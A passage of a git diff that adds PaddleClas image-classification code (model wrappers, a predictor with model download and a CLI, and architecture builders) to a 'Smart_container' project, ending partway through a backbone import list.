MobileNetV3_small_x1_0 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x1_0` model depends on args. 
+ """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_small_x1_0(**kwargs) + + return model + + def mobilenetv3_small_x1_25(pretrained=False, **kwargs): + """ + MobileNetV3_small_x1_25 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x1_25` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.MobileNetV3_small_x1_25(**kwargs) + + return model + + def resnext101_32x4d(pretrained=False, **kwargs): + """ + ResNeXt101_32x4d + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `ResNeXt101_32x4d` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNeXt101_32x4d(**kwargs) + + return model + + def resnext101_64x4d(pretrained=False, **kwargs): + """ + ResNeXt101_64x4d + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `ResNeXt101_64x4d` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNeXt101_64x4d(**kwargs) + + return model + + def resnext152_32x4d(pretrained=False, **kwargs): + """ + ResNeXt152_32x4d + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `ResNeXt152_32x4d` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNeXt152_32x4d(**kwargs) + + return model + + def resnext152_64x4d(pretrained=False, **kwargs): + """ + ResNeXt152_64x4d + Args: + pretrained: bool=False. 
If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `ResNeXt152_64x4d` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNeXt152_64x4d(**kwargs) + + return model + + def resnext50_32x4d(pretrained=False, **kwargs): + """ + ResNeXt50_32x4d + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `ResNeXt50_32x4d` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNeXt50_32x4d(**kwargs) + + return model + + def resnext50_64x4d(pretrained=False, **kwargs): + """ + ResNeXt50_64x4d + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `ResNeXt50_64x4d` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.ResNeXt50_64x4d(**kwargs) + + return model + + def darknet53(pretrained=False, **kwargs): + """ + DarkNet53 + Args: + pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise. + kwargs: + class_dim: int=1000. Output dim of last fc layer. + Returns: + model: nn.Layer. Specific `ResNeXt50_64x4d` model depends on args. + """ + kwargs.update({'pretrained': pretrained}) + model = backbone.DarkNet53(**kwargs) + + return model diff --git a/Smart_container/PaddleClas/paddleclas.py b/Smart_container/PaddleClas/paddleclas.py new file mode 100644 index 0000000..91cd030 --- /dev/null +++ b/Smart_container/PaddleClas/paddleclas.py @@ -0,0 +1,552 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os +import sys +__dir__ = os.path.dirname(__file__) +sys.path.append(os.path.join(__dir__, "")) +sys.path.append(os.path.join(__dir__, "deploy")) + +from typing import Union, Generator +import argparse +import shutil +import textwrap +import tarfile +import requests +import warnings +from functools import partial +from difflib import SequenceMatcher + +import cv2 +import numpy as np +from tqdm import tqdm +from prettytable import PrettyTable + +from deploy.python.predict_cls import ClsPredictor +from deploy.utils.get_image_list import get_image_list +from deploy.utils import config + +from ppcls.arch.backbone import * + +__all__ = ["PaddleClas"] + +BASE_DIR = os.path.expanduser("~/.paddleclas/") +BASE_INFERENCE_MODEL_DIR = os.path.join(BASE_DIR, "inference_model") +BASE_IMAGES_DIR = os.path.join(BASE_DIR, "images") +BASE_DOWNLOAD_URL = "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/inference/{}_infer.tar" +MODEL_SERIES = { + "AlexNet": ["AlexNet"], + "DarkNet": ["DarkNet53"], + "DeiT": [ + "DeiT_base_distilled_patch16_224", "DeiT_base_distilled_patch16_384", + "DeiT_base_patch16_224", "DeiT_base_patch16_384", + "DeiT_small_distilled_patch16_224", "DeiT_small_patch16_224", + "DeiT_tiny_distilled_patch16_224", "DeiT_tiny_patch16_224" + ], + "DenseNet": [ + "DenseNet121", "DenseNet161", "DenseNet169", "DenseNet201", + "DenseNet264" + ], + "DPN": ["DPN68", "DPN92", "DPN98", "DPN107", "DPN131"], + "EfficientNet": [ + "EfficientNetB0", "EfficientNetB0_small", "EfficientNetB1", + "EfficientNetB2", "EfficientNetB3", "EfficientNetB4", 
"EfficientNetB5", + "EfficientNetB6", "EfficientNetB7" + ], + "GhostNet": + ["GhostNet_x0_5", "GhostNet_x1_0", "GhostNet_x1_3", "GhostNet_x1_3_ssld"], + "HRNet": [ + "HRNet_W18_C", "HRNet_W30_C", "HRNet_W32_C", "HRNet_W40_C", + "HRNet_W44_C", "HRNet_W48_C", "HRNet_W64_C", "HRNet_W18_C_ssld", + "HRNet_W48_C_ssld" + ], + "Inception": ["GoogLeNet", "InceptionV3", "InceptionV4"], + "MobileNetV1": [ + "MobileNetV1_x0_25", "MobileNetV1_x0_5", "MobileNetV1_x0_75", + "MobileNetV1", "MobileNetV1_ssld" + ], + "MobileNetV2": [ + "MobileNetV2_x0_25", "MobileNetV2_x0_5", "MobileNetV2_x0_75", + "MobileNetV2", "MobileNetV2_x1_5", "MobileNetV2_x2_0", + "MobileNetV2_ssld" + ], + "MobileNetV3": [ + "MobileNetV3_small_x0_35", "MobileNetV3_small_x0_5", + "MobileNetV3_small_x0_75", "MobileNetV3_small_x1_0", + "MobileNetV3_small_x1_25", "MobileNetV3_large_x0_35", + "MobileNetV3_large_x0_5", "MobileNetV3_large_x0_75", + "MobileNetV3_large_x1_0", "MobileNetV3_large_x1_25", + "MobileNetV3_small_x1_0_ssld", "MobileNetV3_large_x1_0_ssld" + ], + "RegNet": ["RegNetX_4GF"], + "Res2Net": [ + "Res2Net50_14w_8s", "Res2Net50_26w_4s", "Res2Net50_vd_26w_4s", + "Res2Net200_vd_26w_4s", "Res2Net101_vd_26w_4s", + "Res2Net50_vd_26w_4s_ssld", "Res2Net101_vd_26w_4s_ssld", + "Res2Net200_vd_26w_4s_ssld" + ], + "ResNeSt": ["ResNeSt50", "ResNeSt50_fast_1s1x64d"], + "ResNet": [ + "ResNet18", "ResNet18_vd", "ResNet34", "ResNet34_vd", "ResNet50", + "ResNet50_vc", "ResNet50_vd", "ResNet50_vd_v2", "ResNet101", + "ResNet101_vd", "ResNet152", "ResNet152_vd", "ResNet200_vd", + "ResNet34_vd_ssld", "ResNet50_vd_ssld", "ResNet50_vd_ssld_v2", + "ResNet101_vd_ssld", "Fix_ResNet50_vd_ssld_v2", "ResNet50_ACNet_deploy" + ], + "ResNeXt": [ + "ResNeXt50_32x4d", "ResNeXt50_vd_32x4d", "ResNeXt50_64x4d", + "ResNeXt50_vd_64x4d", "ResNeXt101_32x4d", "ResNeXt101_vd_32x4d", + "ResNeXt101_32x8d_wsl", "ResNeXt101_32x16d_wsl", + "ResNeXt101_32x32d_wsl", "ResNeXt101_32x48d_wsl", + "Fix_ResNeXt101_32x48d_wsl", "ResNeXt101_64x4d", 
"ResNeXt101_vd_64x4d", + "ResNeXt152_32x4d", "ResNeXt152_vd_32x4d", "ResNeXt152_64x4d", + "ResNeXt152_vd_64x4d" + ], + "SENet": [ + "SENet154_vd", "SE_HRNet_W64_C_ssld", "SE_ResNet18_vd", + "SE_ResNet34_vd", "SE_ResNet50_vd", "SE_ResNeXt50_32x4d", + "SE_ResNeXt50_vd_32x4d", "SE_ResNeXt101_32x4d" + ], + "ShuffleNetV2": [ + "ShuffleNetV2_swish", "ShuffleNetV2_x0_25", "ShuffleNetV2_x0_33", + "ShuffleNetV2_x0_5", "ShuffleNetV2_x1_0", "ShuffleNetV2_x1_5", + "ShuffleNetV2_x2_0" + ], + "SqueezeNet": ["SqueezeNet1_0", "SqueezeNet1_1"], + "SwinTransformer": [ + "SwinTransformer_large_patch4_window7_224_22kto1k", + "SwinTransformer_large_patch4_window12_384_22kto1k", + "SwinTransformer_base_patch4_window7_224_22kto1k", + "SwinTransformer_base_patch4_window12_384_22kto1k", + "SwinTransformer_base_patch4_window12_384", + "SwinTransformer_base_patch4_window7_224", + "SwinTransformer_small_patch4_window7_224", + "SwinTransformer_tiny_patch4_window7_224" + ], + "VGG": ["VGG11", "VGG13", "VGG16", "VGG19"], + "VisionTransformer": [ + "ViT_base_patch16_224", "ViT_base_patch16_384", "ViT_base_patch32_384", + "ViT_large_patch16_224", "ViT_large_patch16_384", + "ViT_large_patch32_384", "ViT_small_patch16_224" + ], + "Xception": [ + "Xception41", "Xception41_deeplab", "Xception65", "Xception65_deeplab", + "Xception71" + ] +} + + +class ImageTypeError(Exception): + """ImageTypeError. + """ + + def __init__(self, message=""): + super().__init__(message) + + +class InputModelError(Exception): + """InputModelError. 
+ """ + + def __init__(self, message=""): + super().__init__(message) + + +def init_config(model_name, + inference_model_dir, + use_gpu=True, + batch_size=1, + topk=5, + **kwargs): + imagenet1k_map_path = os.path.join( + os.path.abspath(__dir__), "ppcls/utils/imagenet1k_label_list.txt") + cfg = { + "Global": { + "infer_imgs": kwargs["infer_imgs"] + if "infer_imgs" in kwargs else False, + "model_name": model_name, + "inference_model_dir": inference_model_dir, + "batch_size": batch_size, + "use_gpu": use_gpu, + "enable_mkldnn": kwargs["enable_mkldnn"] + if "enable_mkldnn" in kwargs else False, + "cpu_num_threads": kwargs["cpu_num_threads"] + if "cpu_num_threads" in kwargs else 1, + "enable_benchmark": False, + "use_fp16": kwargs["use_fp16"] if "use_fp16" in kwargs else False, + "ir_optim": True, + "use_tensorrt": kwargs["use_tensorrt"] + if "use_tensorrt" in kwargs else False, + "gpu_mem": kwargs["gpu_mem"] if "gpu_mem" in kwargs else 8000, + "enable_profile": False + }, + "PreProcess": { + "transform_ops": [{ + "ResizeImage": { + "resize_short": kwargs["resize_short"] + if "resize_short" in kwargs else 256 + } + }, { + "CropImage": { + "size": kwargs["crop_size"] + if "crop_size" in kwargs else 224 + } + }, { + "NormalizeImage": { + "scale": 0.00392157, + "mean": [0.485, 0.456, 0.406], + "std": [0.229, 0.224, 0.225], + "order": '' + } + }, { + "ToCHWImage": None + }] + }, + "PostProcess": { + "main_indicator": "Topk", + "Topk": { + "topk": topk, + "class_id_map_file": imagenet1k_map_path + } + } + } + if "save_dir" in kwargs: + if kwargs["save_dir"] is not None: + cfg["PostProcess"]["SavePreLabel"] = { + "save_dir": kwargs["save_dir"] + } + if "class_id_map_file" in kwargs: + if kwargs["class_id_map_file"] is not None: + cfg["PostProcess"]["Topk"]["class_id_map_file"] = kwargs[ + "class_id_map_file"] + + cfg = config.AttrDict(cfg) + config.create_attr_dict(cfg) + return cfg + + +def args_cfg(): + def str2bool(v): + return v.lower() in ("true", "t", "1") + + parser = 
argparse.ArgumentParser() + parser.add_argument( + "--infer_imgs", + type=str, + required=True, + help="The image(s) to be predicted.") + parser.add_argument( + "--model_name", type=str, help="The model name to be used.") + parser.add_argument( + "--inference_model_dir", + type=str, + help="The directory of model files. Valid when model_name not specifed." + ) + parser.add_argument( + "--use_gpu", type=str, default=True, help="Whether use GPU.") + parser.add_argument("--gpu_mem", type=int, default=8000, help="") + parser.add_argument( + "--enable_mkldnn", + type=str2bool, + default=False, + help="Whether use MKLDNN. Valid when use_gpu is False") + parser.add_argument("--cpu_num_threads", type=int, default=1, help="") + parser.add_argument( + "--use_tensorrt", type=str2bool, default=False, help="") + parser.add_argument("--use_fp16", type=str2bool, default=False, help="") + parser.add_argument( + "--batch_size", type=int, default=1, help="Batch size. Default by 1.") + parser.add_argument( + "--topk", + type=int, + default=5, + help="Return topk score(s) and corresponding results. Default by 5.") + parser.add_argument( + "--class_id_map_file", + type=str, + help="The path of file that map class_id and label.") + parser.add_argument( + "--save_dir", + type=str, + help="The directory to save prediction results as pre-label.") + parser.add_argument( + "--resize_short", + type=int, + default=256, + help="Resize according to short size.") + parser.add_argument( + "--crop_size", type=int, default=224, help="Centor crop size.") + + args = parser.parse_args() + return vars(args) + + +def print_info(): + """Print list of supported models in formatted. 
+ """ + table = PrettyTable(["Series", "Name"]) + try: + sz = os.get_terminal_size() + width = sz.columns - 30 if sz.columns > 50 else 10 + except OSError: + width = 100 + for series in MODEL_SERIES: + names = textwrap.fill(" ".join(MODEL_SERIES[series]), width=width) + table.add_row([series, names]) + width = len(str(table).split("\n")[0]) + print("{}".format("-" * width)) + print("Models supported by PaddleClas".center(width)) + print(table) + print("Powered by PaddlePaddle!".rjust(width)) + print("{}".format("-" * width)) + + +def get_model_names(): + """Get the model names list. + """ + model_names = [] + for series in MODEL_SERIES: + model_names += (MODEL_SERIES[series]) + return model_names + + +def similar_architectures(name="", names=[], thresh=0.1, topk=10): + """Find the most similar topk model names. + """ + scores = [] + for idx, n in enumerate(names): + if n.startswith("__"): + continue + score = SequenceMatcher(None, n.lower(), name.lower()).quick_ratio() + if score > thresh: + scores.append((idx, score)) + scores.sort(key=lambda x: x[1], reverse=True) + similar_names = [names[s[0]] for s in scores[:min(topk, len(scores))]] + return similar_names + + +def download_with_progressbar(url, save_path): + """Download from url with progressbar. 
+ """ + if os.path.isfile(save_path): + os.remove(save_path) + response = requests.get(url, stream=True) + total_size_in_bytes = int(response.headers.get("content-length", 0)) + block_size = 1024 # 1 Kibibyte + progress_bar = tqdm(total=total_size_in_bytes, unit="iB", unit_scale=True) + with open(save_path, "wb") as file: + for data in response.iter_content(block_size): + progress_bar.update(len(data)) + file.write(data) + progress_bar.close() + if total_size_in_bytes == 0 or progress_bar.n != total_size_in_bytes or not os.path.isfile( + save_path): + raise Exception( + f"Something went wrong while downloading file from {url}") + + +def check_model_file(model_name): + """Check the model files exist and download and untar when no exist. + """ + storage_directory = partial(os.path.join, BASE_INFERENCE_MODEL_DIR, + model_name) + url = BASE_DOWNLOAD_URL.format(model_name) + + tar_file_name_list = [ + "inference.pdiparams", "inference.pdiparams.info", "inference.pdmodel" + ] + model_file_path = storage_directory("inference.pdmodel") + params_file_path = storage_directory("inference.pdiparams") + if not os.path.exists(model_file_path) or not os.path.exists( + params_file_path): + tmp_path = storage_directory(url.split("/")[-1]) + print(f"download {url} to {tmp_path}") + os.makedirs(storage_directory(), exist_ok=True) + download_with_progressbar(url, tmp_path) + with tarfile.open(tmp_path, "r") as tarObj: + for member in tarObj.getmembers(): + filename = None + for tar_file_name in tar_file_name_list: + if tar_file_name in member.name: + filename = tar_file_name + if filename is None: + continue + file = tarObj.extractfile(member) + with open(storage_directory(filename), "wb") as f: + f.write(file.read()) + os.remove(tmp_path) + if not os.path.exists(model_file_path) or not os.path.exists( + params_file_path): + raise Exception( + f"Something went wrong while praparing the model[{model_name}] files!" 
class PaddleClas(object):
    """User-facing predictor: classify images with a released PaddleClas model.
    """

    # Print the supported-model table once, at class-definition time.
    print_info()

    def __init__(self,
                 model_name: str=None,
                 inference_model_dir: str=None,
                 use_gpu: bool=True,
                 batch_size: int=1,
                 topk: int=5,
                 **kwargs):
        """Init PaddleClas with config.

        Args:
            model_name (str, optional): The model name supported by PaddleClas. If specified, override config. Defaults to None.
            inference_model_dir (str, optional): The directory that contained model file and params file to be used. If specified, override config. Defaults to None.
            use_gpu (bool, optional): Whether use GPU. If specified, override config. Defaults to True.
            batch_size (int, optional): The batch size to predict. If specified, override config. Defaults to 1.
            topk (int, optional): Return the top k prediction results with the highest score. Defaults to 5.
        """
        super().__init__()
        self._config = init_config(model_name, inference_model_dir, use_gpu,
                                   batch_size, topk, **kwargs)
        self._check_input_model()
        self.cls_predictor = ClsPredictor(self._config)

    def get_config(self):
        """Get the config.
        """
        return self._config

    def _check_input_model(self):
        """Check the input model name or model files.

        Raises:
            InputModelError: When neither a known model name nor a directory
                with inference.pdmodel/inference.pdiparams is provided.
        """
        candidate_model_names = get_model_names()
        input_model_name = self._config.Global.get("model_name", None)
        inference_model_dir = self._config.Global.get("inference_model_dir",
                                                      None)
        if input_model_name is not None:
            similar_names = similar_architectures(input_model_name,
                                                  candidate_model_names)
            similar_names_str = ", ".join(similar_names)
            if input_model_name not in candidate_model_names:
                err = f"{input_model_name} is not provided by PaddleClas. \nMaybe you want: [{similar_names_str}]. \nIf you want to use your own model, please specify inference_model_dir!"
                raise InputModelError(err)
            # Download (when absent) and locate the released model files.
            self._config.Global.inference_model_dir = check_model_file(
                input_model_name)
            return
        elif inference_model_dir is not None:
            model_file_path = os.path.join(inference_model_dir,
                                           "inference.pdmodel")
            params_file_path = os.path.join(inference_model_dir,
                                            "inference.pdiparams")
            if not os.path.isfile(model_file_path) or not os.path.isfile(
                    params_file_path):
                err = f"There is no model file or params file in this directory: {inference_model_dir}"
                raise InputModelError(err)
            return
        else:
            err = f"Please specify the model name supported by PaddleClas or directory contained model files(inference.pdmodel, inference.pdiparams)."
            raise InputModelError(err)

    def _predict_and_report(self, img_list, img_path_list, print_pred, topk):
        """Run one batch through the predictor; optionally print per-file results."""
        outputs = self.cls_predictor.predict(img_list)
        preds = self.cls_predictor.postprocess(outputs, img_path_list)
        if print_pred and preds:
            for pred in preds:
                filename = pred.pop("file_name")
                pred_str = ", ".join([f"{k}: {pred[k]}" for k in pred])
                # BUGFIX: report the actual file name; the original popped
                # `filename` but printed a hard-coded placeholder.
                print(f"filename: {filename}, top-{topk}, {pred_str}")
        return preds

    def predict(self, input_data: Union[str, np.ndarray],
                print_pred: bool=False) -> Generator[list, None, None]:
        """Predict input_data.

        Args:
            input_data (Union[str, np.ndarray]):
                When the type is str, it is the path of image, or the directory containing images, or the URL of image from Internet.
                When the type is np.ndarray, it is the image data whose channel order is RGB.
            print_pred (bool, optional): Whether print the prediction result. Defaults to False.

        Raises:
            ImageTypeError: Illegal input_data.

        Yields:
            Generator[list, None, None]:
                The prediction result(s) of input_data by batch_size. For every one image,
                prediction result(s) is zipped as a dict, that includes topk "class_ids", "scores" and "label_names".
                The format is as follow: [{"class_ids": [...], "scores": [...], "label_names": [...]}, ...]
        """
        if isinstance(input_data, np.ndarray):
            outputs = self.cls_predictor.predict(input_data)
            yield self.cls_predictor.postprocess(outputs)
        elif isinstance(input_data, str):
            # "https://..." also startswith "http", so one check covers both.
            if input_data.startswith("http"):
                image_storage_dir = partial(os.path.join, BASE_IMAGES_DIR)
                os.makedirs(image_storage_dir(), exist_ok=True)
                image_save_path = image_storage_dir("tmp.jpg")
                download_with_progressbar(input_data, image_save_path)
                input_data = image_save_path
                warnings.warn(
                    f"Image to be predicted from Internet: {input_data}, has been saved to: {image_save_path}"
                )
            image_list = get_image_list(input_data)

            batch_size = self._config.Global.get("batch_size", 1)
            # BUGFIX: topk lives under PostProcess.Topk (see init_config);
            # reading PostProcess.topk always fell back to 1 in the printout.
            topk = self._config.PostProcess.get("Topk", {}).get("topk", 1)

            img_list = []
            img_path_list = []
            for img_path in image_list:
                img = cv2.imread(img_path)
                if img is None:
                    warnings.warn(
                        f"Image file failed to read and has been skipped. The path: {img_path}"
                    )
                    continue
                # OpenCV loads BGR; the predictor expects RGB.
                img = img[:, :, ::-1]
                img_list.append(img)
                img_path_list.append(img_path)

                if len(img_list) == batch_size:
                    preds = self._predict_and_report(img_list, img_path_list,
                                                     print_pred, topk)
                    img_list = []
                    img_path_list = []
                    yield preds
            # BUGFIX: flush the trailing partial batch unconditionally. The
            # original flushed only when the *last listed* image was readable,
            # so a trailing unreadable file silently dropped the final batch.
            if img_list:
                yield self._predict_and_report(img_list, img_path_list,
                                               print_pred, topk)
        else:
            err = "Please input legal image! The type of image supported by PaddleClas are: NumPy.ndarray and string of local path or Internet URL"
            raise ImageTypeError(err)
        return


# for CLI
def main():
    """Function API used for command line.
    """
    cfg = args_cfg()
    clas_engine = PaddleClas(**cfg)
    res = clas_engine.predict(cfg["infer_imgs"], print_pred=True)
    for _ in res:
        pass
    print("Predict complete!")
    return


if __name__ == "__main__":
    main()
def build_model(config):
    """Instantiate an architecture from an arch config dict.

    Args:
        config (dict): "name" selects the class/function exposed by this
            module; remaining keys are forwarded as keyword arguments.

    Returns:
        nn.Layer: The constructed model.
    """
    config = copy.deepcopy(config)  # don't mutate the caller's config
    model_type = config.pop("name")
    mod = importlib.import_module(__name__)
    arch = getattr(mod, model_type)(**config)
    return arch


def apply_to_static(config, model):
    """Optionally wrap `model` with paddle.jit.to_static.

    Enabled by config["Global"]["to_static"]; when "image_shape" is present
    it fixes the input spec (the batch dimension stays dynamic).
    """
    support_to_static = config['Global'].get('to_static', False)

    if support_to_static:
        specs = None
        if 'image_shape' in config['Global']:
            specs = [InputSpec([None] + config['Global']['image_shape'])]
        model = to_static(model, input_spec=specs)
        logger.info("Successfully to apply @to_static with specs: {}".format(
            specs))
    return model


class RecModel(nn.Layer):
    """Recognition model: backbone plus optional neck and head.

    Config keys: Backbone (required), BackboneStopLayer, Neck, Head.
    """

    def __init__(self, **config):
        super().__init__()
        backbone_config = config["Backbone"]
        backbone_name = backbone_config.pop("name")
        self.backbone = eval(backbone_name)(**backbone_config)
        if "BackboneStopLayer" in config:
            # Truncate the backbone after the named layer.
            backbone_stop_layer = config["BackboneStopLayer"]["name"]
            self.backbone.stop_after(backbone_stop_layer)

        self.neck = build_gear(config["Neck"]) if "Neck" in config else None
        self.head = build_gear(config["Head"]) if "Head" in config else None

    def forward(self, x, label=None):
        """Return {"features": backbone/neck output, "logits": head output or None}."""
        x = self.backbone(x)
        if self.neck is not None:
            x = self.neck(x)
        y = self.head(x, label) if self.head is not None else None
        return {"features": x, "logits": y}


class DistillationModel(nn.Layer):
    """Hold several sub-models (e.g. teacher/student) and run them side by side.

    Args:
        models (list): One-element dicts mapping a sub-model key to its config
            ("name" plus constructor kwargs).
        pretrained_list (list, optional): Per-model pretrained weight paths.
        freeze_params_list (list, optional): Per-model flags; True freezes
            that sub-model's parameters.
    """

    def __init__(self,
                 models=None,
                 pretrained_list=None,
                 freeze_params_list=None,
                 **kargs):
        super().__init__()
        assert isinstance(models, list)
        self.model_list = []
        self.model_name_list = []
        if pretrained_list is not None:
            assert len(pretrained_list) == len(models)

        if freeze_params_list is None:
            freeze_params_list = [False] * len(models)
        assert len(freeze_params_list) == len(models)
        for idx, model_config in enumerate(models):
            assert len(model_config) == 1
            key = list(model_config.keys())[0]
            model_config = model_config[key]
            model_name = model_config.pop("name")
            model = eval(model_name)(**model_config)

            if freeze_params_list[idx]:
                for param in model.parameters():
                    param.trainable = False
            self.model_list.append(self.add_sublayer(key, model))
            self.model_name_list.append(key)

        if pretrained_list is not None:
            for idx, pretrained in enumerate(pretrained_list):
                if pretrained is not None:
                    # BUGFIX: load the weights into the sub-model itself; the
                    # original passed the model's *name* (a str), which cannot
                    # receive a state dict.
                    load_dygraph_pretrain(
                        self.model_list[idx], path=pretrained)

    def forward(self, x, label=None):
        """Run every sub-model on x; return {sub-model key: output}."""
        result_dict = dict()
        for idx, model_name in enumerate(self.model_name_list):
            if label is None:
                result_dict[model_name] = self.model_list[idx](x)
            else:
                result_dict[model_name] = self.model_list[idx](x, label)
        return result_dict
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import sys +import inspect + +from ppcls.arch.backbone.legendary_models.mobilenet_v1 import MobileNetV1_x0_25, MobileNetV1_x0_5, MobileNetV1_x0_75, MobileNetV1 +from ppcls.arch.backbone.legendary_models.mobilenet_v3 import MobileNetV3_small_x0_35, MobileNetV3_small_x0_5, MobileNetV3_small_x0_75, MobileNetV3_small_x1_0, MobileNetV3_small_x1_25, MobileNetV3_large_x0_35, MobileNetV3_large_x0_5, MobileNetV3_large_x0_75, MobileNetV3_large_x1_0, MobileNetV3_large_x1_25 +from ppcls.arch.backbone.legendary_models.resnet import ResNet18, ResNet18_vd, ResNet34, ResNet34_vd, ResNet50, ResNet50_vd, ResNet101, ResNet101_vd, ResNet152, ResNet152_vd, ResNet200_vd +from ppcls.arch.backbone.legendary_models.vgg import VGG11, VGG13, VGG16, VGG19 +from ppcls.arch.backbone.legendary_models.inception_v3 import InceptionV3 +from ppcls.arch.backbone.legendary_models.hrnet import HRNet_W18_C, HRNet_W30_C, HRNet_W32_C, HRNet_W40_C, HRNet_W44_C, HRNet_W48_C, HRNet_W60_C, HRNet_W64_C, SE_HRNet_W64_C +from ppcls.arch.backbone.legendary_models.pp_lcnet import PPLCNet_x0_25, PPLCNet_x0_35, PPLCNet_x0_5, PPLCNet_x0_75, PPLCNet_x1_0, PPLCNet_x1_5, PPLCNet_x2_0, PPLCNet_x2_5 + +from ppcls.arch.backbone.model_zoo.resnet_vc import ResNet50_vc +from ppcls.arch.backbone.model_zoo.resnext import ResNeXt50_32x4d, ResNeXt50_64x4d, ResNeXt101_32x4d, ResNeXt101_64x4d, ResNeXt152_32x4d, ResNeXt152_64x4d +from ppcls.arch.backbone.model_zoo.resnext_vd import ResNeXt50_vd_32x4d, ResNeXt50_vd_64x4d, ResNeXt101_vd_32x4d, ResNeXt101_vd_64x4d, ResNeXt152_vd_32x4d, ResNeXt152_vd_64x4d +from 
ppcls.arch.backbone.model_zoo.res2net import Res2Net50_26w_4s, Res2Net50_14w_8s +from ppcls.arch.backbone.model_zoo.res2net_vd import Res2Net50_vd_26w_4s, Res2Net101_vd_26w_4s, Res2Net200_vd_26w_4s +from ppcls.arch.backbone.model_zoo.se_resnet_vd import SE_ResNet18_vd, SE_ResNet34_vd, SE_ResNet50_vd +from ppcls.arch.backbone.model_zoo.se_resnext_vd import SE_ResNeXt50_vd_32x4d, SE_ResNeXt50_vd_32x4d, SENet154_vd +from ppcls.arch.backbone.model_zoo.se_resnext import SE_ResNeXt50_32x4d, SE_ResNeXt101_32x4d, SE_ResNeXt152_64x4d +from ppcls.arch.backbone.model_zoo.dpn import DPN68, DPN92, DPN98, DPN107, DPN131 +from ppcls.arch.backbone.model_zoo.densenet import DenseNet121, DenseNet161, DenseNet169, DenseNet201, DenseNet264 +from ppcls.arch.backbone.model_zoo.efficientnet import EfficientNetB0, EfficientNetB1, EfficientNetB2, EfficientNetB3, EfficientNetB4, EfficientNetB5, EfficientNetB6, EfficientNetB7, EfficientNetB0_small +from ppcls.arch.backbone.model_zoo.resnest import ResNeSt50_fast_1s1x64d, ResNeSt50, ResNeSt101 +from ppcls.arch.backbone.model_zoo.googlenet import GoogLeNet +from ppcls.arch.backbone.model_zoo.mobilenet_v2 import MobileNetV2_x0_25, MobileNetV2_x0_5, MobileNetV2_x0_75, MobileNetV2, MobileNetV2_x1_5, MobileNetV2_x2_0 +from ppcls.arch.backbone.model_zoo.shufflenet_v2 import ShuffleNetV2_x0_25, ShuffleNetV2_x0_33, ShuffleNetV2_x0_5, ShuffleNetV2_x1_0, ShuffleNetV2_x1_5, ShuffleNetV2_x2_0, ShuffleNetV2_swish +from ppcls.arch.backbone.model_zoo.ghostnet import GhostNet_x0_5, GhostNet_x1_0, GhostNet_x1_3 +from ppcls.arch.backbone.model_zoo.alexnet import AlexNet +from ppcls.arch.backbone.model_zoo.inception_v4 import InceptionV4 +from ppcls.arch.backbone.model_zoo.xception import Xception41, Xception65, Xception71 +from ppcls.arch.backbone.model_zoo.xception_deeplab import Xception41_deeplab, Xception65_deeplab +from ppcls.arch.backbone.model_zoo.resnext101_wsl import ResNeXt101_32x8d_wsl, ResNeXt101_32x16d_wsl, ResNeXt101_32x32d_wsl, 
